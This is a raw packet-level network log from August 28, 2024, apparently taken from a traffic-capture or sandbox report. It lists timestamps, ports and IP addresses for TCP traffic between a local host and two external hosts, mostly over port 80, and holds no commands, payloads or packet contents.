Aug 28, 2024 14:02:02.115945101 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.233572960 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.233592033 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.233603954 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.233618021 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.233629942 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.233649015 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.233650923 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.233664036 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.233674049 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.233692884 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.233714104 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.233784914 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.233798027 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.233809948 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.233830929 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.233881950 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.233899117 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.233911037 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.233922005 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.233936071 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.233936071 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.233949900 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.233980894 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.234190941 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234203100 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234215021 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234239101 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.234271049 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234282970 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234293938 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234306097 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234318018 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234324932 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.234349966 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.234366894 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.234630108 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234663963 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234675884 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234709978 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.234740019 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234759092 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234771013 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234781981 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.234782934 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234805107 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234810114 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.234817982 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234829903 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234841108 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.234858990 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.234884024 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.235177994 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.235232115 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.235244036 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.235270023 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.235292912 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.235301971 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.235312939 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.235325098 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.235337973 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.235352039 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.235384941 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.235411882 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.235426903 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.235436916 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.235450029 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.235461950 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.235471010 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.235482931 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.235488892 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.235496998 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.235510111 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.235519886 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.235555887 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.236008883 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.236036062 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.236047029 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.236078978 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.236116886 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.236128092 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.236140013 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.236154079 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.236174107 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.236187935 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.236200094 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.236211061 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.236222982 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.236233950 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.236238003 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.236258984 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.354706049 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.354720116 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.354732990 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.354751110 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.354754925 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.354767084 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.354783058 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.354792118 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.354798079 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.354810953 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.354816914 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.354825020 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.354846954 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.354866982 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.354887009 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.354898930 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.354909897 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.354935884 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.354973078 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.354984045 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.354995966 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355021000 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.355050087 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.355082989 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355096102 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355107069 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355118990 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355130911 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355133057 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.355144978 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355154991 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.355175972 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355192900 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.355194092 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355201006 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355238914 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.355768919 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355779886 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355799913 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355809927 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355820894 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355823040 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.355844975 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.355859041 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.355880976 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355895042 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355906010 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355918884 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355931044 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355931044 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.355943918 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355957031 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355958939 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.355973959 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.355981112 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.356079102 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.356436014 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.356448889 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.356461048 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.356473923 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.356517076 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.356537104 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.356549025 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.356559038 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.356565952 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.356573105 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.356599092 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.356637001 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.356657028 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.356668949 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.356679916 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.356693029 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.356704950 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.356709003 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.356718063 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.356735945 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.356738091 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.356749058 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.357275963 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.357287884 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.357299089 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.357327938 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.357336044 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.357348919 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.357356071 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.357361078 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.357377052 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.357403040 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.357431889 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.358098984 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.362842083 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:24.199309111 CEST | 57484 | 49738 | 172.111.137.132 | 192.168.2.4
Aug 28, 2024 14:02:24.211246014 CEST | 49738 | 57484 | 192.168.2.4 | 172.111.137.132
Aug 28, 2024 14:02:24.216139078 CEST | 57484 | 49738 | 172.111.137.132 | 192.168.2.4
Aug 28, 2024 14:02:32.459510088 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:32.464476109 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:32.464607000 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:32.464818954 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:32.469625950 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.150626898 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.150649071 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.150659084 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.150670052 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.150681019 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.150691986 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.150702000 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.150715113 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.150727987 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.150738001 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.150777102 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.150837898 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.155635118 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.155648947 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.155658960 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.155704021 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.155730009 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.271969080 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.271982908 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.272003889 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.272015095 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.272031069 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.272032976 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.272079945 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.272411108 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.272430897 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.272442102 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.272450924 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.272455931 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.272466898 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.272489071 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.272519112 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.273273945 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.273298025 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.273310900 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.273323059 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.273339033 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.273341894 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.273353100 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.273376942 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.392066002 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.392080069 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.392090082 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.392191887 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.392201900 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.392250061 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.392291069 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.392458916 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.392498016 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.392505884 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.392510891 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.392532110 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.392544985 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.392549038 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.392560959 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.392597914 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.393062115 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.393085957 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.393095970 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.393104076 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.393121004 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.393140078 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.393162012 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.393172979 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.393184900 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.393199921 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.393276930 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.394090891 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.394114017 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.394124031 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.394146919 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.394154072 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.394159079 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.394182920 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.512948036 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.512976885 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.513057947 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.513057947 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.513247967 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.513261080 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.513273001 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.513304949 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:33.513308048 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.513323069 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:33.513329029 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
                                                            Aug 28, 2024 14:02:33.513336897 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.513346910 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.513359070 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.513361931 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.513382912 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.513400078 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.514022112 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.514034033 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.514056921 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.514066935 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.514071941 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.514081001 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.514085054 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.514092922 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.514111996 CEST4974480192.168.2.4193.25.216.165
